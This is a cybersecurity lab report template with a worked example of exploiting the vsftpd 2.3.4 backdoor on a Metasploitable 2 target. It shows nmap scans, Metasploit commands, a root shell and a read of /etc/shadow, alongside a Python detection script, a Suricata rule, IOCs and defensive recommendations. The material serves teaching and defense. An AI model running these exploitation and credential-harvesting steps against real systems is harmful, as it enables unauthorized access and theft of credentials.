# LAB REPORT TEMPLATE

# Apophis Networking Security Lab

**Student Name:** ___________________________

**Module Number:** ___________________________

**Lab Title:** ___________________________

**Date Submitted:** ___________________________

---

## 1. EXECUTIVE SUMMARY (1 paragraph)

Provide a high-level overview of the lab objectives, key findings, and outcomes. This should be understandable by non-technical stakeholders.

**Example:**

> This lab focused on exploiting the vsftpd 2.3.4 backdoor vulnerability (CVE-2011-2523) on a Metasploitable 2 target system. The exploitation was successful, resulting in root-level access to the target. Post-exploitation activities included credential harvesting and persistence establishment. This exercise demonstrated the critical importance of patch management and network segmentation in preventing unauthorized access.

---

## 2. OBJECTIVES

List the specific learning objectives for this lab.

**Example:**

- Configure and execute Metasploit Framework exploits
- Understand the mechanics of reverse shell payloads
- Perform post-exploitation enumeration
- Document exploitation chains for penetration testing reports

---

## 3. TOOLS & ENVIRONMENT

### 3.1 Attack Platform

- **OS:** Kali Linux 2024.1
- **IP Address:** 10.10.2.50
- **Tools Used:**
  - Metasploit Framework v6.3.x
  - Nmap 7.94
  - Wireshark 4.0.x

### 3.2 Target System

- **OS:** Metasploitable 2 (Ubuntu 8.04)
- **IP Address:** 10.10.4.10
- **Vulnerable Services:**
  - vsftpd 2.3.4 (Port 21)
  - OpenSSH 4.7p1 (Port 22)
  - Apache 2.2.8 (Port 80)

### 3.3 Network Topology

```
[Kali Linux]          [pfSense Firewall]          [Metasploitable 2]
10.10.2.50   <--->   10.10.2.1 | 10.10.4.1   <--->   10.10.4.10
VLAN 200                                             VLAN 400
(Red Team)                                           (Victim Network)
```

---

## 4. METHODOLOGY

Describe the step-by-step process followed during the lab. Use numbered steps and include relevant commands.
### 4.1 Pre-Exploitation: Reconnaissance

**Step 1: Host Discovery**

```bash
nmap -sn 10.10.4.0/24
```

**Output:**

```
Nmap scan report for 10.10.4.10
Host is up (0.00042s latency).
```

**Step 2: Port Scanning**

```bash
sudo nmap -sS -sV -p- 10.10.4.10 -oA full_scan
```

**Output:**

```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1
...
```

**Analysis:** vsftpd 2.3.4 identified—known to contain backdoor vulnerability (CVE-2011-2523).

### 4.2 Exploitation

**Step 3: Launch Metasploit**

```bash
msfconsole -q
```

**Step 4: Select Exploit Module**

```bash
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.4.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
```

**Output:**

```
[*] 10.10.4.10:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.4.10:6200 - Shell command shell session 1 opened
```

**Result:** Successful exploitation. Root shell obtained.

### 4.3 Post-Exploitation

**Step 5: Verify Access**

```bash
id
```

**Output:**

```
uid=0(root) gid=0(root)
```

**Step 6: Credential Harvesting**

```bash
cat /etc/shadow
```

**Output:** (Include first 3 lines only for report)

```
root:$1$XjpI2OBz$...:0:0:root:/root:/bin/bash
daemon:*:14684:0:99999:7:::
...
```

---

## 5. FINDINGS & ANALYSIS

### 5.1 Key Discoveries

**Vulnerability Identified:**

- **CVE:** CVE-2011-2523
- **Severity:** Critical (CVSS 10.0)
- **Description:** vsftpd 2.3.4 contains malicious backdoor code that opens shell access on port 6200 when username contains `:)` smiley face.
- **Exploitability:** Trivial—no authentication required.
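The two observable artefacts named in this description (an FTP `USER` command carrying the `:)` trigger, then a TCP connection to port 6200 on the same server) are exactly what a blue team would hunt for. The script below is an added defensive example, not part of the original lab template or of any tool it mentions: it reads Suricata EVE JSON lines, correlates the two stages per client/server pair, and emits findings with a severity that depends on whether both stages were seen. The field names follow Suricata's `ftp` and `flow` event types; the sample events, timestamps and addresses are constructed for illustration (they reuse the lab's 10.10.x.x addresses).

```python
"""Correlate vsftpd 2.3.4 backdoor indicators in Suricata EVE JSON.

Added example for this lab report template; not code from the template
or from Suricata. Field names follow Suricata's 'ftp' and 'flow' EVE
event types. SAMPLE_EVE_LINES below are constructed, not captured data.
"""
import json
from datetime import datetime, timedelta

TRIGGER = ":)"            # username substring that activates the backdoor
BACKDOOR_PORT = 6200      # port on which the backdoor shell listens
WINDOW = timedelta(seconds=60)  # max gap between USER trigger and 6200 flow

# Constructed sample events (not a real capture). Lines 2 and 3 together form
# the full attack pattern; line 1 is a benign FTP login, line 4 unrelated HTTP.
SAMPLE_EVE_LINES = [
    '{"timestamp":"2024-03-01T10:00:01.000000+0000","event_type":"ftp",'
    '"src_ip":"10.10.2.50","src_port":41222,"dest_ip":"10.10.4.10","dest_port":21,'
    '"ftp":{"command":"USER","command_data":"anonymous"}}',
    '{"timestamp":"2024-03-01T10:00:05.000000+0000","event_type":"ftp",'
    '"src_ip":"10.10.2.50","src_port":41224,"dest_ip":"10.10.4.10","dest_port":21,'
    '"ftp":{"command":"USER","command_data":"abc:)"}}',
    '{"timestamp":"2024-03-01T10:00:06.000000+0000","event_type":"flow",'
    '"src_ip":"10.10.2.50","src_port":41226,"dest_ip":"10.10.4.10","dest_port":6200,'
    '"proto":"TCP"}',
    '{"timestamp":"2024-03-01T10:05:00.000000+0000","event_type":"flow",'
    '"src_ip":"10.10.4.20","src_port":50000,"dest_ip":"10.10.4.10","dest_port":80,'
    '"proto":"TCP"}',
]


def parse_events(lines):
    """Parse EVE JSON lines, skipping malformed ones, and sort by timestamp."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
            ev["_ts"] = datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
        except (json.JSONDecodeError, KeyError, ValueError):
            continue  # a bad log line must not abort the whole detection run
        events.append(ev)
    return sorted(events, key=lambda e: e["_ts"])


def find_backdoor_indicators(lines):
    """Return a list of findings, one per suspicious client/server observation."""
    events = parse_events(lines)

    # Stage 1: FTP USER commands to port 21 that carry the trigger string.
    triggers = [
        e for e in events
        if e.get("event_type") == "ftp" and e.get("dest_port") == 21
        and e.get("ftp", {}).get("command") == "USER"
        and TRIGGER in e["ftp"].get("command_data", "")
    ]
    # Stage 2: any TCP flow to the backdoor port is an indicator on its own.
    flows = [e for e in events
             if e.get("event_type") == "flow" and e.get("dest_port") == BACKDOOR_PORT]

    findings = []
    matched_triggers = set()
    for f in flows:
        finding = {"src_ip": f["src_ip"], "dest_ip": f["dest_ip"], "severity": "medium",
                   "reason": "TCP connection to vsftpd backdoor port 6200"}
        for i, t in enumerate(triggers):
            same_pair = t["src_ip"] == f["src_ip"] and t["dest_ip"] == f["dest_ip"]
            if same_pair and timedelta(0) <= f["_ts"] - t["_ts"] <= WINDOW:
                # Both stages from the same client to the same server: near-certain exploitation.
                finding["severity"] = "critical"
                finding["reason"] = "FTP USER with ':)' trigger followed by connection to port 6200"
                matched_triggers.add(i)
        findings.append(finding)

    # A trigger with no follow-up flow is still an exploitation attempt worth alerting on.
    for i, t in enumerate(triggers):
        if i not in matched_triggers:
            findings.append({"src_ip": t["src_ip"], "dest_ip": t["dest_ip"], "severity": "high",
                             "reason": "FTP USER containing ':)' trigger (no port 6200 flow seen)"})
    return findings


if __name__ == "__main__":
    for finding in find_backdoor_indicators(SAMPLE_EVE_LINES):
        print(f"[{finding['severity'].upper()}] {finding['src_ip']} -> "
              f"{finding['dest_ip']}: {finding['reason']}")
```

Run against the constructed sample it reports one critical finding for 10.10.2.50 -> 10.10.4.10; the benign FTP login and the HTTP flow produce nothing. In a real deployment you would feed it `eve.json` from Security Onion and tune `WINDOW` to the observed gap between the trigger and the shell connection. Note that the Suricata rule in section 8.1 covers only stage 2; this correlation adds stage 1 so that a failed or blocked shell connection is still visible.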
**Impact Assessment:**

- **Confidentiality:** HIGH—Full read access to all files including /etc/shadow
- **Integrity:** HIGH—Root access allows file modification
- **Availability:** HIGH—Attacker could delete files or crash system

### 5.2 Network Traffic Analysis

**Wireshark Observations:**

- TCP stream 1: FTP connection (port 21) with malicious username
- TCP stream 2: Shell session on port 6200
- No encryption—all commands visible in plaintext

**Screenshot:** [Include Wireshark screenshot showing backdoor traffic]

---

## 6. INDICATORS OF COMPROMISE (IOCs)

| Type | Value | Description |
|------|-------|-------------|
| IP Address | 10.10.2.50 | Attacker source IP |
| Port | 6200 | vsftpd backdoor listening port |
| Process | vsftpd | Spawned root shell (suspicious parent) |
| Network | TCP SYN to 6200 | Connection to non-standard FTP port |

---

## 7. DEFENSIVE RECOMMENDATIONS

### 7.1 Immediate Actions

1. **Patch vsftpd:** Upgrade to version 3.0.5 or disable service if not needed
2. **Network Segmentation:** Block victim network from initiating connections to Red Team VLAN
3. **IDS Rule:** Deploy Suricata signature for port 6200 connections

### 7.2 Long-Term Improvements

1. **Vulnerability Management:** Implement automated scanning (weekly)
2. **Patch Management:** Establish SLA for critical patches (24-48 hours)
3. **Firewall Rules:** Default-deny egress from victim network
4. **Security Monitoring:** Alert on connections to non-standard ports

---

## 8. DETECTION ENGINEERING

### 8.1 Suricata Rule

```
alert tcp any any -> any 6200 (msg:"vsftpd 2.3.4 Backdoor Connection"; flow:established,to_server; sid:1000050; rev:1;)
```

### 8.2 Security Onion Query (KQL)

```
destination.port: 6200 AND event.module: "suricata"
```

### 8.3 MITRE ATT&CK Mapping

- **Tactic:** Initial Access (TA0001)
- **Technique:** T1190 - Exploit Public-Facing Application
- **Sub-Technique:** FTP Service Exploitation

---

## 9. CHALLENGES & TROUBLESHOOTING

**Challenge 1:** Initial exploit failed with "connection refused"

**Root Cause:** VLAN tag not set correctly on VM network interface in Proxmox.

**Solution:**

```bash
# Proxmox VM > Hardware > Network Device > Edit
# VLAN Tag: 400 (was blank)
```

**Challenge 2:** Wireshark showed no captured packets

**Root Cause:** Capturing on wrong interface (wlan0 instead of eth0).

**Solution:**

```bash
sudo tcpdump -i eth0   # Verify interface has traffic
sudo wireshark -i eth0
```

---

## 10. LESSONS LEARNED

### What Went Well

- Successful identification and exploitation of vulnerability
- Comprehensive documentation with screenshots
- Effective use of network segmentation for safe testing

### What Could Be Improved

- Faster troubleshooting (spent 30 minutes on VLAN issue)
- More thorough initial reconnaissance (missed some services)
- Should have taken VM snapshot before exploitation

### Key Takeaways

1. **Offensive Perspective:** Outdated software is trivially exploitable—attackers have automated scanners for this.
2. **Defensive Perspective:** One unpatched service can compromise entire network. Defense-in-depth is critical.
3. **Forensics Importance:** Without packet capture, proving the attack vector would be difficult in IR scenario.

---

## 11. APPENDICES

### Appendix A: Command History

```bash
# Full command history from Kali terminal
history > command_history.txt
```

(Attach file: command_history.txt)

### Appendix B: Screenshots

- Screenshot 1: Nmap scan results showing vsftpd 2.3.4
- Screenshot 2: Metasploit successful exploitation
- Screenshot 3: Root shell access (id command output)
- Screenshot 4: Wireshark PCAP showing port 6200 connection
- Screenshot 5: Security Onion alert for detection

### Appendix C: Packet Capture

(Attach file: exploitation.pcapng)

### Appendix D: Metasploit Output Log

(Attach file: msfconsole.log)

---

## 12. REFERENCES

1. National Vulnerability Database. (2011). CVE-2011-2523. Retrieved from https://nvd.nist.gov/vuln/detail/CVE-2011-2523
2. Rapid7. (2024). Metasploit Framework Documentation. Retrieved from https://docs.rapid7.com/metasploit/
3. MITRE Corporation. (2024). ATT&CK Framework - T1190. Retrieved from https://attack.mitre.org/techniques/T1190/
4. OWASP. (2021). Top 10 Web Application Security Risks. Retrieved from https://owasp.org/Top10/

---

## 13. DECLARATION

I certify that this lab report represents my own work and that all tools were used in an authorized, ethical manner within the confines of my personal lab environment. I understand that unauthorized computer access is illegal.

**Signature:** ___________________________

**Date:** ___________________________

---

**END OF LAB REPORT**

---

# GRADING RUBRIC FOR THIS REPORT

| Section | Points | Criteria |
|---------|--------|----------|
| Executive Summary | 5 | Clear, concise, non-technical language |
| Methodology | 20 | Step-by-step, reproducible, includes commands |
| Findings & Analysis | 20 | Technical depth, vulnerability details, impact |
| Screenshots | 15 | Relevant, annotated, high-quality |
| Detection Engineering | 15 | Custom rules, MITRE mapping, queries |
| Defensive Recommendations | 10 | Actionable, prioritized, realistic |
| Lessons Learned | 5 | Self-reflection, improvement mindset |
| Documentation Quality | 10 | Formatting, grammar, professionalism |
| **TOTAL** | **100** | |

**Minimum Passing Score:** 70/100